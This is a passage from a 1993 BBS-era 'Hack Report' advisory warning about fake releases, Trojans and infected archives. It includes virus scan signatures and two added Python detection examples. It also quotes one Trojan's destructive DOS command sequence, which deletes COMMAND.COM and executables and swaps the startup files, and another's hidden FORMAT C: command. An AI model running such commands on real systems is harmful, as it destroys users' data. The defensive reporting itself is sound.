  to him.  Frisk didn't want them to do this, but it appears that an
  archive with the "registration form" may have slipped into distribution.
  In Frisk's words, "...this version is most certainly not something that I
  want distributed."

  From the "Not Really A Program, but Interesting Anyway" department, a
  "press release" has entered distribution, claiming that PKWare Inc. has
  filed for Chapter 11 bankruptcy.  The letter is dated Friday, February
  26, 1993, and supposedly quotes Mark Gresbach of PKWare in the statement.

  However, in a message posted in the CompuServe PKWARE forum on March 1,
  1993, PKWare employee Douglas Hay states that this is not true.  Douglas
  also points out that the perpetrator of the hoax misspelled the word
  Milwaukee (as 'Milwaukie'), and that one of the three phone numbers in
  the message for PKWare is wrong.  In short, ignore the letter - PKWare
  has _not_ filed bankruptcy.

  Other previously reported hoaxes:

  Filename      Claimed use/Actual activity/Reporter(s)
  ============  ==========================================================
  PKZ305        Hacked "new version" of PKZip.  However, a message in wide
                circulation claimed this was infected with a virus called
                PROTO-T.  This message is the actual hoax:  there may be
                one or more PROTO-T viruses around now, but none do what
                was claimed in the hoax message.  This hack, PKZ305, was
                not infected with any virus, nor did it contain Trojan
                code, per testing by Bill Logan (1:300/22), HW Jeff White,
                and HW Bill Lambdin.

  RAOPT         "Optimizes" your RemoteAccess BBS files and claims to be
                from Continental Software.  Actually does nothing but read
                your USERS.BBS file and report the number of users.  The
                program is _not_ from Continental Software, according to
                Andrew Milner.  Reported by Kai Sundren (2:201/150), via
                HW Mikael Winterkvist.

  SCORCHV2      Claims to be v2.0 of the game Scorched Earth:  this version
                doesn't yet exist.  Actually a renamed archive of version
                1.2.  Reported by Brian Dhatt (1:3648/2.5).

  =========================================================================

                              The Trojan Wars

  Well, folks, it has happened again.  Someone apparently doesn't like the
  idea of The Hack Report, and has decided to take a hack at it themselves.
  Fortunately, it was caught rather quickly, thanks to the people who read
  and support the report.  Your assistance is very much appreciated, folks!
  This isn't the only new report for the month - oh yes, there is more.
  So, sit back, buckle up, enjoy the scenery, and read on.

| As I just mentioned, there has been another attack against The Hack
| Report itself:  this time, against the August issue.  James Anderson
| (1:379/609) left a message on Jack Cross's system (1:3805/13, Official
| Hack Report Utility Distribution Site) and a copy of the August report
| archive which contained the file HMON.EXE.  This Trojan, found by one of
| James's users on a Florida BBS, attacks mostly .exe files on your path,
| as well as some Windows programs and COMMAND.COM (according to James's
| report).
|
| The archive of the report had one of its text files altered as well.  The
| NOTE9308.TXT file had a paragraph inserted at the beginning which claimed
| that the HMON.EXE file was a "small virus-detection program" that "i and
| others (sic) were developing."  Those of you who have followed this
| report since its start would suspect this immediately, as I have
| previously stated that I am not an anti-viral programmer or researcher:
| merely a journalist who relays reports he receives from others.
|
| The paragraph goes on to say (in very bad grammar) that the file should
| be placed in the same directory as SCAN.EXE, and recommends that you put
| it on your path.  I do not know why, but I would assume that it looks for
| McAfee's SCAN and does something nasty to it.
|
| In any event, allow me to restate the warning that I made when this
| happened previously:
|
|       THE OFFICIAL ARCHIVE OF THE HACK REPORT WILL _NEVER_ CONTAIN
|       ANY EXECUTABLE OR BATCH FILE!  ONLY TEXT FILES AND NON-
|       EXECUTABLE BINARY FILES WILL BE INCLUDED IN THE REPORT ARCHIVE.
|
| If you have _any_ doubt of the legitimacy of your copy of the report,
| please inform your friendly neighborhood HackWatcher or myself, and
| contact one of the official distribution sites to obtain an official
| copy.
|
| With the above in mind, and taking into regard the best interests of the
| BBS community, HACK9308 goes into the report as a file to avoid.

| From the "I'll Sell You the Brooklyn Bridge for $5" department:  a file
| claiming to be an archiver that can achieve 1500:1 compression of almost
| any file has been spotted. Sounds too good to be true?  You're right:  it
| is too good to be true.
|
| The file in question is called OWS95B.  The first report I received on it
| came via HW Bob Seaborn, although at least a dozen reports similar to his
| came through the echos I monitor or through NetMail.  In short, the file
| does nothing more than act like an "undelete" utility of sorts, storing
| filenames and copying them to other directories.  Test results of this
| file can be seen in the file FILETSTS.LZH, part of the archive version of
| The Hack Report.  Look for two files inside this internal archive:  a
| text report from Kevin Gates (1:140/64) called OWS.RES, and a dump of the
| data segment of the program, DS_DUMP.OWS.
|
| If you have a copy of this program and need to see for yourself that it
| is a fraud, here is a test devised by Bob that should do the trick.
|
| *** The Seaborn Test
|
|     1) Create a temporary working directory (\WORK) and a temporary test
|        directory (\TEST) on any drive.
|     2) Copy any number of mixed files into the \WORK directory.
|     3) Use OWS.EXE to create \TEST\archive.ows of \WORK\*.*
|     4) Now use SUNOWS.COM to tear apart \TEST\archive.ows, with the files
|        going into the \TEST directory.
|
|     At this point everything should appear to work properly.
|
|     5) Delete all the original files in the \WORK\*.* directory.
|     6) Use SUNOWS.COM to extract all the files in the \TEST\archive.ows
|        file to restore all the files originally in the \WORK directory.
|
|     This will fail, giving you a "Sector Not Found, Abort, Retry, Fail"
|     error, and there's nothing that you can do to solve this error.
|
| This file was originally reported in the Hoax Alert section of this
| report.  However, Aryeh Goretsky, SysOp of the McAfee VirusForum on
| CompuServe (76702,1714) pointed out that this is actually a Trojan.  Here
| are his comments, used by permission:
|
|   "The program is indeed a Trojan horse.  It is an expectation of the
|   author that the user will delete the original uncompressed file.  An
|   expectation that is filled most of the time...."
|
| I had not considered this when I classed the file as a simple Hoax.
| However, Aryeh is right.  This is a very sneaky Trojan.  It doesn't do
| any damage to your system:  instead, it fools you into doing the damage
| yourself.

| Ian Douglas (5:7105/119) forwarded a sighting of RAG2FIX from Tiaan Van
| Aardt (5:7105/8).  This file, a supposed "fix" for RemoteAccess
| v2.00gamma, gives itself away by using the company name "Continental
| Software" - a name no longer in use by the RA folks.  The Trojan first
| searches for your FILES.RA file, and then erases all files in the current
| directory, your RA.KEY file, and any ARJ, LZH, and ZIP files it runs
| across.  Hopefully, this hasn't spread outside of FidoNet Zone 5
| (Africa), but you never know:  keep your eyes open.

| Carl Johnson (1:115/363) reported on VIZ534, a possible isolated incident
| involving a program called VIZ.  From Carl's analysis, he was unable to
| determine if this was a pure Trojan, an altered legitimate program, or a
| Trojan masquerading as a legitimate program.  However, Michael Toth, a
| regular contributor to The Hack Report, received a copy of the file and
| verified its destructive behaviour.  Here are the archive contents:
|
|       Files in archive:          VIZ.DAT, 22426 bytes
|                                  VIZ.COM,  3163 bytes
|                                  VIZ.DOC, 65715 bytes
|                                  VIZ.REG,  3676 bytes
|
|       What it's supposed to do:  Accelerate video performance, as
|                                  well as do a few utilities with
|                                  the video display.
|
| Carl learned that when the VIZ.COM file is run, it renames VIZ.DAT to
| BE.EXE (a file from The Norton Utilities v6.X, known as Batch Enhancer).
| Next, it displays a configuration screen, then displays the string:
|
|                   "Is this text in red? (Y/N)"
|
| At some point during all of this, it executes the system command
| FORMAT C: /Q /U, apparently suppressing the output and replacing it with
| the above string.  This tricks the user into answering "yes" to the
| normal warning about all data on the non-removable drive being lost.
| John says that he was lucky in that he uses MS-DOS 6.0 and DoubleSpace,
| which prevented the normal FORMAT command from operating (a side benefit
| of DoubleSpace?  Trojan protection?  Interesting.).

| HW Bill Lambdin received a file for testing from Brian O'Sullivan.  The
| file, SPORT21C, claims to be a serial port analyzer.  It seems that Brian
| has located an infected copy of the program, possibly an isolated
| incident.  The INSTALL.COM file in the archive is infected with a new
| variant of the Butterfly virus, which differs from the original in that
| it contains the text "Hurray the Crusades!", and that it infects .exe
| files as well as .com files.  Bill provides the following information for
| users of Frisk's F-Prot and other scanners that allow for external scan
| strings:
|
|     "F-Prot 2.09 detects this virus as Butterfly in .COM files, but
|     misses it in .EXE files. Add this signature to F-Prot or other
|     scanners that allow the use of an external signature file.
|
|       Name: Butterfly (Crusades)
|       Infects: .COM and .EXE files.
|       Signature: B4 4E 8D B6 50 02 8D 96 2C 02 52 EB 3C B4 1A BA
|
|     Remove the spaces between the HEX values when adding the signature."

| Martin Roesler (Martin_Roesler@nem.fido.de, 2:246/149) posted a message
| in the FidoNet VIRUS_INFO echo that was rather short and to the point.
| He stated that a file called BREAKARJ is circulating in Germany, and that
| it contains the Split virus.  He ended by saying that Split is a simple
| COM infector, 250 bytes long, and can be detected with the following
| signature:
|
|           9CFC 8DB6 DF01 BF00 01B9 0200
|
| Short, to the point, and much appreciated.
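
  The two scan strings above can be checked against any file with a few
  lines of code.  The following is an added example, not part of the
  original report or of any scanner it names:  it strips the spacing from
  each string as Bill's note instructs, then searches a stream chunk by
  chunk, keeping enough overlap that a signature split across two reads
  is still found.  The function names and the sample buffer are
  assumptions made for the illustration.

```python
import io
import re

# Scan strings copied from the report; each reporter groups the hex differently.
SIGNATURES = {
    "Butterfly (Crusades)": "B4 4E 8D B6 50 02 8D 96 2C 02 52 EB 3C B4 1A BA",
    "Split": "9CFC 8DB6 DF01 BF00 01B9 0200",
}


def parse_signature(text):
    """Strip the spacing and return the raw bytes of a hex scan string."""
    compact = re.sub(r"\s+", "", text)
    if not compact or len(compact) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", compact):
        raise ValueError(f"not a whole number of hex bytes: {text!r}")
    return bytes.fromhex(compact)


def scan_stream(stream, signatures=SIGNATURES, chunk_size=4096):
    """Return sorted (name, file offset) pairs for every signature hit.

    The search looks at content only, so a .EXE file is scanned exactly
    like a .COM file.
    """
    if chunk_size < 1:
        raise ValueError("chunk_size must be at least 1")
    patterns = {name: parse_signature(sig) for name, sig in signatures.items()}
    # Carry the last (longest pattern - 1) bytes into the next read so a
    # signature that straddles a chunk boundary is still matched.
    overlap = max(len(p) for p in patterns.values()) - 1
    hits = set()
    tail = b""
    base = 0  # file offset of the first byte of `tail + chunk`
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        window = tail + chunk
        for name, pattern in patterns.items():
            pos = window.find(pattern)
            while pos != -1:
                hits.add((name, base + pos))  # the set removes re-found hits
                pos = window.find(pattern, pos + 1)
        keep = min(overlap, len(window))
        tail = window[len(window) - keep:] if keep else b""
        base += len(window) - keep
    return sorted(hits)


def build_sample():
    """Constructed test buffer: an MZ-style header plus both byte strings.

    It contains only the signature bytes with padding, not any virus code.
    """
    butterfly = parse_signature(SIGNATURES["Butterfly (Crusades)"])
    split = parse_signature(SIGNATURES["Split"])
    return b"MZ" + b"\x90" * 8 + butterfly + b"\x00" * 20 + split + b"\x00" * 5


if __name__ == "__main__":
    # A 16-byte chunk size forces the Butterfly string across a boundary.
    for name, offset in scan_stream(io.BytesIO(build_sample()), chunk_size=16):
        print(f"{name} at offset {offset}")
```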

  Glenn Jordan (1:3641/1.201) reports on a "wave of Trojans down in
  Oklahoma" (or up in Oklahoma, depending on your geographical
  perspective).  His contact originally came via Doug Taylor of the
  Vanishing Point BBS.  According to Glenn, someone got a bunch of [IVP]
  produced viruses and a Trojan produced by a Trojan Construction Kit, then
  proceeded to upload them to quite a few systems.  The only filename
  provided, however, was ZIPCHAP, which contained an ANSI bomb that
  redefined your spacebar to invoke an internal ZIPCHAP program (apparently
  infected - Glenn's copy was corrupted and wouldn't run).

  This ANSI bomb is a bit different from others that I have seen, but not
  unique in its method.  It is stored inside the archive under the filename
  CON.  In other words, it's actually a device bomb variant - turning off
  ANSI comments in PKZIP or other unpackers won't stop it, since it isn't
  part of the header.  Instead, unpacking the file causes the device CON to
  be opened, and the bomb is written straight to it as a result.
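
  Both the device-name trick described here and the earlier rule that the
  official Hack Report archive never contains an executable or batch file
  can be checked before anything is unpacked.  The following is an added
  example, not part of the original report:  it reads a ZIP listing in
  memory and flags members named after DOS devices and members that are
  executables by extension or by header.  It assumes ZIP format only; the
  function names, the finding labels and the sample archive contents are
  constructed for the illustration.

```python
import io
import zipfile
from pathlib import PurePosixPath

# DOS/Windows device names.  A name such as CON.TXT still resolves to the
# device, so the extension is ignored when matching.
DEVICE_NAMES = {"CON", "PRN", "AUX", "NUL"} | {
    f"{prefix}{n}" for prefix in ("COM", "LPT") for n in range(1, 10)
}
EXEC_EXTENSIONS = {".EXE", ".COM", ".BAT"}


def audit_member(name, head):
    """Return the findings for one member name and its first two bytes."""
    path = PurePosixPath(name.replace("\\", "/"))
    findings = []
    # Check every path component, not just the final file name.
    if any(part.split(".", 1)[0].strip().upper() in DEVICE_NAMES
           for part in path.parts):
        findings.append("device-name")
    if path.suffix.upper() in EXEC_EXTENSIONS:
        findings.append("executable-extension")
    elif head[:2] in (b"MZ", b"ZM"):
        # DOS .EXE header under a harmless-looking extension.
        findings.append("executable-header")
    return findings


def audit_archive(data):
    """Map each suspicious member of a ZIP (given as bytes) to its findings.

    Members are read in memory only; nothing is extracted to disk, so a
    member named CON never reaches the console device.
    """
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                head = member.read(2)
            findings = audit_member(info.filename, head)
            if findings:
                report[info.filename] = findings
    return report


def build_sample():
    """Constructed archive: file names echo the report, contents are dummies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("HACK9308.TXT", "constructed report text\n")
        zf.writestr("NOTE9308.TXT", "constructed note text\n")
        zf.writestr("HMON.EXE", b"MZ" + b"\x00" * 30)
        zf.writestr("CON", b"placeholder, not a key-redefinition sequence")
        zf.writestr("DOCS/con.txt", b"placeholder")
        zf.writestr("VIEWER.DAT", b"MZ\x90\x00" + b"\x00" * 28)
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in audit_archive(build_sample()).items():
        print(f"{member}: {', '.join(findings)}")
```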

  HW Chris Wise received reports on two Trojans from Jim Deal (address not
  given).  The first, PRIN2UNP, claimed to be an "unprotect" for Prince of
  Persia 2, but appears to be a compiled batch file that does a good deal
  of damage.  It starts by deleting everything in your C: drive root
  directory, as well as the directory C:\DOS.  It then checks to see if you
  are running a BBS:  if so, it deletes the files in your BBS directory.
  Finally, it looks for other drives in your system and deletes their root
  directories as well.

  The second Trojan, VECTORS, was described as a Sound Blaster demo
  program.  It was compressed with PKLite v1.15.  This one simply deletes
  all files in your C: drive's root directory, but that is enough to make
  your system unbootable for a while.  This wasn't a compiled batch file:
  however, Jim's report stated it contained some Borland BGI drivers, which
  indicates it had some graphics in it (apparently to show off).

  Jim says that both files came from the same place.  I assume he meant
  they were both done by the same person, as both had a message inside that
  said, "Thanks for trusting F.*.C.K.S.  INFORMER."

  Rod Fewster (3:640/886) did a bit of detective work on a file claiming
  to be version 8.2 of Vern Buerg's LIST program, under the filename
  LIST82.  He says he called Mr. Buerg to confirm the file, and verified
  that this is not a valid release.  In fact, the file Rod received from
  one of his users is infected.

  His examination of the file shows it to be compressed with PKLite, using
  the "no unpack" option.  Further, the documentation has been altered to
  look authentic, and the archive was packed with a PKZip -AV stamp which
  displays the text "Authentic files from Vernon D. Buerg" when unzipped.
  The only giveaways Rod could find were that the internal help screen date
  didn't match the filedates, and the copyright notice reads "1983-92".

  Rod says the file is infected with a variant of the Butterfly virus which
  he calls the FJM virus ("for want of a better name").  This virus infects
  .com files in the directory it is executed in by attaching itself to the
  end of a few files at a time, increasing each file's size by 305 bytes.
  The infected files then spread the infection.  The virus does not attack
  COMMAND.COM, nor does it attack files "smaller than about 100 bytes."

  The virus does not show immediately inside of the LIST program, but the
  files it infects are detectable by VirusBuster v4.00.23, F-Prot, and
  TBAV in heuristic mode.  VirusBuster can disinfect the infected files.

  Rod provided the following scan string that users of VirusBuster v4.xx
  can add to their VBTSR.DAT file:

        Butterfly/FJM
        ED ?12 96 ?10 96 ?0F DB ?08 BC ?02 BD ?04 ED ?02 DB

  He says this will stop Butterfly and FJM dead in their tracks.  Thanks
  for the report, Rod!

  An extremely widely reported incident concerned Winfred Hu's Telemate
  program, v4.11.  Winfred himself has confirmed that an internal
  self-extracting archive, VESA.EXE, which is part of the archive TM411-4,
  contains two files that are infected with the Butterfly virus.  These
  files, in the archive subdirectory OAK, are 37VESA.COM and 67VESA.COM.
  The infection can be detected by F-Prot v2.08a.

  Winfred has since distributed a replacement archive, TM411-4A, which does
  not contain these files.  (This has now been superseded by a new
  version, TM412-1 through TM412-4.)  He has asked that anyone who has the
  infected archive delete it and replace it with the newest version. He
  also stresses that neither Telemate nor GIFLink (part of the Telemate
  package) is infected - only the two VESA drivers.

  Winfred has since informed me via HW Richard Steiner that the same VESA
  drivers are present in the files GIFLK110 and GIFLK111.  He has asked
  that these two archives be deleted and replaced with GIFLK112 (or the
  most current version).  GIFLK112 has a README.TXT file which mentions the
  infected VESA drivers inside the v1.10 and v1.11 files.

  He also states that he has traced the infection back to an isolated
  incident of an infected copy of LIST77B.  He was unable to say for
  certain where this copy originally came from.

  Editorial - as I've said before, it takes a lot of courage for an author
  to publicly announce such a problem with their software.  Winfred Hu is
  to be commended for his handling of this situation, and for the prompt
  action he has taken to resolve it.

  Gary Marden (2:258/27) has located a Trojan version of a file that was
  quite popular last year - USRPATCH.  This was originally distributed as a
  "patch" to the ROMs of a certain modem that would take advantage of a bug
  left in the ROM chips in order to upgrade the modem to faster speeds.

  However, this Trojan takes advantage of your system instead of your
  modem.  At first look, it appears to be a mutation of the BILLNTED Trojan
  reported last year by David Elkins (2:254/78).  Gary says that it acts
  more like the QOUTES Trojan reported later in this section.  It displays
  the following messages once you invoke the internal USRPATCH.EXE file:

      Please wait, extracting user files.Bill'N'Ted have begun their
         bogus journey...
      Bill'N'Ted have begun their bogus journey.
      Looks like an Evil Robot Bill'N'Ted have trashed your drive, dude!

  At this point, your prompt turns into a simple "C>".  If you press Enter,
  your screen displays the message, "So long, suckers!", and then clears,
  leaving you with a system that is quite useless.

  Gary's test, performed on an MFM drive, resulted in a hard drive with the
  first 128 cylinders low-level formatted.  This included the partition
  table, boot sectors, and FATs.  Repair is not possible using FDISK alone,
  since the first 128 cylinders remain inaccessible.  The only practical
  repair is to perform your own low-level format, followed by FDISK and a
  high-level format.

  Gary did not test this with an IDE drive, but I am willing to wager that
  he would have had the same results.  Repair would not have been as
  simple, however - unless you have some heavy-duty IDE utility software,
  you'd have to send your drive back to the manufacturer for a low-level
  format.  Most bogus indeed.

  HW Emanuel Levy forwarded a report from John Rose (1:106/6001) about
  FORUM30.  The file, according to John, was "cleverly disguised as a 'new
  BBS package'...."  However, John says it formatted both of his hard
  drives.

  Andrew Barnhardt (1:247/301) forwarded a post from Dom D'amato
  (1:141/510) about an Amiga Trojan/dropper in circulation.  The file,
  MCHECK, claims to be a modem test utility.  However, the original
  reporter, Luca Spada (2:331/106.0), states that this file reports that
  your modem is "OK" even if no modem is attached to your system.
  Apparently, the Trojan monitors the keyboard for activity - if you leave
  it alone for 5-10 minutes, it begins to overwrite random tracks on your
  hard drive with endless obscenity.  Luca says it can reduce all of your
  partitions to garbage in about 4 seconds.

  Another unidentified user reported that the Trojan looks for the presence
  of an antiviral background program called SnoopDos - if it finds it, it
  deactivates it.

  The archive contains these two files:

       Modemcheck.doc    2227 Bytes
       Modemchecker     15516 Bytes

  Definitely sounds like one that Amiga users should avoid.

  HW Ken Whiton forwarded a message from Wildnet user Kevin Tischler about
  an incident of a tampered version of the AVScan antiviral tool, AVSCAN83.
  This file supposedly contains an internal file called VIRUS.DAT, which is
  "sometimes unzipped" by the host program, leaving five files behind.
  These five files are 911.COM, YANKEE.COM, SYSLOCK.COM, ANTHRAX.COM, and
  "a program reporting to be an icon viewer/maker called rim300.zip."
  Kevin reports that Microsoft Anti-Virus (part of MS-DOS 6.0) was able to
  detect the infection - from the way it looks, the first 4 files are the
  real things.

  Ryan Thompson (1:124/2213) reports that one of his users found a file
  calling itself ARJ240, claiming to be the non-beta release of the next
  ARJ archiver.  This immediately trips a flag, since the author of ARJ,
  Robert Jung, has publicly stated that there would never be a version with
  this number (due to an earlier hack by the same name).

  In any case, the file appears to be not merely a hack, but a simplistic
  Trojan.  The program that was altered to do the damage was REARJ.EXE.
  When Ryan's user ran it, it copied a file called SINBAUD.EXE to the root
  directory and re-wrote the user's autoexec.bat file to invoke this file.
  The SINBAUD file, according to Ryan's inspection, contained "a few
  hard-coded CHKDSK messages, some stuff for displaying a fake DOS prompt",
  and a few other messages.  He did not run the SINBAUD program, which is
  just as well - the overwrite of the autoexec.bat is enough to merit
  Trojan status.

  As many of you might know, The Hack Report does not include listings of
  programs designed to "crack" or "register" other programs.  I feel that
  these files don't need the free publicity that they would get from a
  listing in this report, and that the act of listing might make someone go
  out looking for a copy of one of them.  (See Ray Bradbury's short story,
  "Downwind from Gettysburg," from the collection "I Sing the Body
  Electric!", for an insight to your Hack Squad's thinking on this
  subject.)

  However, a report from David Jones (1 @ 2950 WWIVnet, Internet address
  87-2950@wwiv.tfsquad.mn.org) merits an exception to this rule.  He has
  found a file called RPIT352C, a copy of the online game "The Pit" with a
  "special program that will automatically register it for you."  Inside
  the archive is a README.COM file that is infected with the Leprosy virus.

  This is a good reason to not even download these "cracks" - you never
  know what you're getting into.

  Rod Fewster (3:640/886) reported in the FidoNet VIRUS Echo on a file
  called TNN202 that he tested.  This file apparently contains at least 3
  files named TNN.EXE, TNN.OV1, and TNN.OV2.  TNN.EXE displays the
  following message:

       TNN Anti-Virus (C) 1992-1993 by Syn Labs Inc. Version 2.02.
       Configuring, Please wait....

  At this point, the program renames TNN.OV1 to TNN1.EXE, and TNN.OV2 to
  TNN2.COM.  According to Rod, TNN1.EXE is the "RABID" Trojan, while
  TNN2.EXE is the Beta 1 Trojan.  RABID "whacks out your HD's boot sector,"
  apparently filling it with a rather obscene message.  The Beta 1 Trojan,
  on the other hand, executes the following sequence of commands:

        C:
        CD DOS
        DEL COMMAND.COM
        CD\
        DEL COMMAND.COM
        RENAME AUTOEXEC.BAT TEMP.BAT
        RENAME CONFIG.SYS AUTOEXEC.BAT
        RENAME TEMP.BAT CONFIG.SYS
        CD DOS
        DEL *.EXE

  It then displays its own obscene message on your screen.  Rod says that
  TNN.EXE then displays the following message (edited for television):

        GOODBYE D*******. Wave Ta-Ta to your hard disk.
        Next time, dont enter messages to a public echo if you have
        no idea what you are talking about.
        Love David Humes.

  Rod's results show that TNN.EXE is simply a "loader" for the two Trojans,
  and not dangerous by itself.  He also states that there are other files
  used to "pad out the archive," which are ancillary files from a program
  called VirusBuster v3.91.

  Thanks to Rod for posting his results.  This was definitely a nasty
  little beggar of a Trojan.

  HW Hinrich Donner forwards reports from Zone 2 of a "trainer" for the
  game Strike Commander which doesn't appear to act as it should.  The
  archive was distributed under the filenames SCTRNUNT and SC-TRN.
  SCTRNUNT contains the following files:

             !HIREZ   COM      6888 19.04.93   23:26
             SCTRNUNT EXE      6442 18.04.93   12:49
             UNT      EXE     11431 18.04.93   12:30
             SILVER   NFO        81 19.04.93   23:26
             SWIFT    NFO      3785 18.04.93   12:12
             UNT      NFO     11483 18.04.93   12:26

  Note that the SC-TRN archive contents were not forwarded, but the
  following file size and description were:

         SC-TRN.ARJ     9129 Strike Commander - Trainer by [UNT]

  The file which appears to do the damage, SCTRNUNT.EXE, does so by
  destroying your root directory, partition table, FAT1, and FAT2.

  Teo Chee Kian (6:600/600) received a file called GIF_TSR which claimed to
  convert .gif files to "Photo-like Graphics."  However, the file is
  actually a compiled batch file which seeks out and deletes all
  "important" files in your DOS, QEMM, WINDOWS, STACKER, and some other
  directories.  It also deletes MSDOS.SYS, IO.SYS, COMMAND.COM, CONFIG.SYS,
  and AUTOEXEC.BAT - it calls ATTRIB.EXE to remove the hidden, system, and
  read-only attributes when necessary.  Definitely a file to avoid.

  Emmanuel Bataille (2:320/7) forwarded a message from Serge Ayotte
  (Internet, rider@geolser.login.qc.ca) about a possible isolated incident
  of an infected copy of the BNU FOSSIL Driver, version 1.88 beta
  (BNU188B).  The archive Serge found was infected with the Screaming Fist
  650 virus.  Serge goes on to say that the infection is detectable by
  version 104 of McAfee's ViruScan, but not by version 102.

  Rod Fewster (3:640/886) reports that there are two other dangerous
  versions of BNU, under the filenames BNU200 and BNU202 (see also the
  "Hacked Files" section of this report).  He says that they are identical
  except for differences in the documentation files and internal messages,
  and that both attack your hard drive's partition table and master boot
  record (MBR).

  Note that there is a real version 1.88 beta of BNU, but it was not
  intended for public release, according to the author of BNU, David
  Nugent.  The latest official public release of BNU is v1.70.

  HW Nemrod Kedem (2:403/138) reports that a new Trojan has been found in
  Israel, named RASPEED.  He forwards the following archive information:

  Archive:  RASPEED.ARJ

  Name        Length   Method    SF  Size now Mod Date   Time     CRC
  =========== ======== =======  ==== ======== ========= ======== ========
  RASPEED.EXE    29120 Comp-1    37     18242 21 May 93 08:51:14 B9717331
  RASPEED.DOC     4344 Comp-1    66      1443 21 May 93 12:46:36 194BB7EB
  FILE_ID.DIZ      611 Comp-1    57       262 20 May 93 10:13:48 0E680542
  =========== ======== =======  ==== ======== ========= ======== ========
  *total    3    34075 ARJ 4     40%    21310 29 May 93 21:16:56

  The program is aimed at RemoteAccess BBS Systems - it copies the
  USERS.BBS file over to a file called JACKLINE.GIF located in the first
  file area listed in your FILES.RA file.  It also adds a description to
  the FILES.BBS file that reads "JACKLINE.GIF (640x480x256)".

  This program works with RA v1.11, but not with RA v2.00 gamma.  A full
  text of Nemrod's results can be found in the file RASPEED.RES, part of
  the FILETSTS.LZH archive found in the archive version of The Hack Report.

  David Snider, a user of Douglas Taylor's system (1:147/1077), reports via
  the FidoNet DIRTY_DOZEN echo on a file called BRE0911.  Apparently, a
  file inside this archive called UPDATE.COM is infected with a virus (no
  name given) which David says is only detectable by MS-DOS 6.0's VSAFE
  program.  The virus in question re-writes your COMMAND.COM file, adding
  to it slowly over a period of time:  a fellow sysop who was infected for
  8 days wound up with a COMMAND.COM file over 70K in size.

  According to David's report, there is a legitimate release of this
  program, under the filename BRE0910.  He did not describe what the real
  program was, however, nor did he provide any archive statistics.  All he
  said was that "nothing above BRE0910 is legal".  Shawn McMahon
  (1:206/1701.66) says that this sounds like "Barren Realms Elite," a BBS
  door game.

  Now, some info on a DEBUG script forwarded by Jack Cross (1:3805/13) from
  the FidoNet BATPOWER echo.  The script, which has generated a great deal
  of discussion, created an archive (LZH) of the program TinyCache
  (filename TNYCACHE), claiming to be a small disk cache.

  As soon as the script was posted, folks started reporting symptoms of
  destructive activity:  destroyed FATs and reformatted hard drives have
  been reported after this program was run.

  Prior to the publication of the April edition of this report, I made a
  feeble attempt at analyzing this program myself.  However, as I have said
  before to folks who contact Hack Central Station, I'm a reporter, not an
  AV expert.  So, I forwarded a copy of this script to HW Jeff White of The
  Pueblo Group for testing.  Others ran their own tests, and still others
  forwarded the resulting archive for further testing.  The reports (which
  are _far_ too numerous to credit in their entirety - please accept my
  thanks for your help!) had some similar results, but left some confusion
  as to what this file actually is.

  All of the reports indicate that the unarchived file, TNYCACHE.COM, is
  compressed with PKLite and that the PKLite ID header was edited out of
  the resulting file.  Once decompressed, McAfee's SCAN reported that the
  file was infected with the Taiwan3 [T3] virus, and Frisk's F-Prot
  detected the AntiCAD virus.

  This is where things get weird.  Bill Dirks (1:385/17) reported that
  there were two versions of the file - TNYCACHE.EXE and TNYCACHE.COM.  He
  also said that the .exe version is actually a renamed copy of the SCCHECK
  Trojan, and that the .com version is "hacked to include a hacked version
  of the AntiCAD virus."

  Bill included the following scanner strings for use with McAfee's SCAN:

              "2BC00221200961642E6578652004" Pklited-Anticad
              "46048B4E068B56088B5E0CCD261B" Sccheck-Trojan

  The second string can also be used with Frisk's F-Prot as a user string,
  as long as you inform the program that it is a .com/.exe infector.

  However, Bob Stettina, a user at 1:382/77, had a different analysis of
  this file, based on a report he says he received from Spencer Clarke of
  McAfee Associates.  Bob also decompressed the PKLited .com file and
  received a Taiwan3 [T3] report from McAfee's SCAN v102.  After this, he
  uploaded the file to McAfee Associates.

  The report received from Mr. Clarke said, according to Bob, that this
  file is "a unique/new Trojan, and it is *NOT* actually infected with a
  virus:  rather, this Trojan includes a segment of code that is
  accidentally 'recognized' by SCAN as the Taiwan3 virus."  The report also
  stated that other scanners gave off false alarms on this file.  Finally,
  Bob goes on to say that this file does not replicate:  since the ability
  to reproduce is part of the basic definition of a virus, Bob concludes
  that this one fails that test and is therefore a Trojan.

  HW Jeff White's test results tended to agree with the majority of the
  reports:  the .com file was simply infected with the Taiwan3 [T3] virus,
  and was capable of being "cleaned" by McAfee's Clean-Up v102.

  This has been a fascinating study in program analysis.  Unfortunately,
  the story does not end here.  Oliver Bladek (1:134/49) has found the file
  posted as an archive on a BBS under the filename TNYCACHE.  The file
  exhibited the same symptoms reported above.  It would seem, therefore,
  that whatever the program actually is, be it virus, Trojan, or whatever,
  it has been re-created from the DEBUG script by someone, not run on their
  system, and later absent-mindedly uploaded as an archive to a BBS.  If
  you see this file, make sure it's the same one we're talking about here:
  if it is, delete first and ask questions later.

  Andy Thomas (1:125/217) forwarded a report from Allan Thomas (Smartnet
  Virus Conference) about an infected copy of the archive BBSLAWS.  The
  archive contained two files - NEWLAWS.TXT and README.COM.  The .txt file
  seemed to be for real, but the .com file was another story.  According to
  Allan, the program displays the following message just before it locks up
  your system:

      "Install v1.0 (c) Vivid Imaginations, Ltd.  All rights reversed."

  As Allan points out, note the spelling of the last word in the above
  quote:  quite subtle.  The damage you will find after you reboot is not
  so subtle, though - the program at least overwrites your MBR and 1st FAT,
  deletes itself, and overwrites the remnants of itself with garbage to
  hide the evidence.  When it overwrites itself, it writes enough bytes to
  cover every sector it used to occupy, resulting in a write of more bytes
  than the original file size.

  Paul Harney (1:107/579) forwarded a message from a user, Rod Fewster,
  concerning a sighting of something claiming to be PKZip v2.04I.  The
  file, a self-extracting archive called PKZ204I, shows a "valid"
  authenticity verification on unpacking.  However, Rod says both the
  internal files PKZIP.EXE and PKUNZIP.EXE "whack out your CMOS settings
  totally as soon as they're run."  No other damage was reported.

  Here are the vital stats, as provided by Rod:

        "Archive date is 02-22-93 20:35.

        "All files are dated 02-22-93 02.04 except pkunzip.exe
         which is dated 02-22-93 20:34."

  Rod also provided a comparison between v2.04g and this file's
  executables:

        "v2.04g filesizes are:  pkzip.exe 42166   pkunzip.exe 29378
